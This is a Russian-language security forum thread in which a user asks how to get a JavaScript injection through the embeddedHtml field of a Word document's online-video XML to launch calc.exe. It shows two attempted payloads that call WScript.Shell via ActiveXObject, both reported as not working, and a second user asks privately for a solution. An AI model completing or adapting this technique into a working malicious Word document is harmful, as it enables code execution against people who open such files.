• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Атака с помощью word

OpenDoor

New member
16.02.2020
1
0
BIT
0
Всем привет, меня интересует один вопрос, если смотреть видео от codeby , то в нем вставляют html вставку вместо видео, поизучав дополнительно об этом я нашел файл на гите в котором говорится о HTML/JS инжекте.
Так вот, сам вопрос, как произвести JS инжект(хочу вызвать калькулятор), кто-нибудь пробовал/реализовывал ?
PS мои успехи в это деле(я пытался)

HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml="<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>

заменял embeddedHtml на
HTML:
&lt;script&gt;
var ws = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;C:\\WINDOWS\\system32\\calc.exe&quot;,0);
&lt;/script&gt;

word открывается без ошибок, но кликая на видео word говорил, что не правильно указан URL

еще делал так
HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml=
"
<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>
&lt;script&gt;
var ws = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;C:\\WINDOWS\\system32\\calc.exe&quot;,0);
&lt;/script&gt;
"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>

тут уже лучше, ошибки нет, но и калькулятор не запускается, в чем может быть ошибка?

PSS Word365(лицензия)
PSSS идентификатора CVE у нее, вроде бы, нет.
 

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Тоже ковырял эту багу но так нечего и не вышло. Если кто то имеет решение стукните в ПМ. плз.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!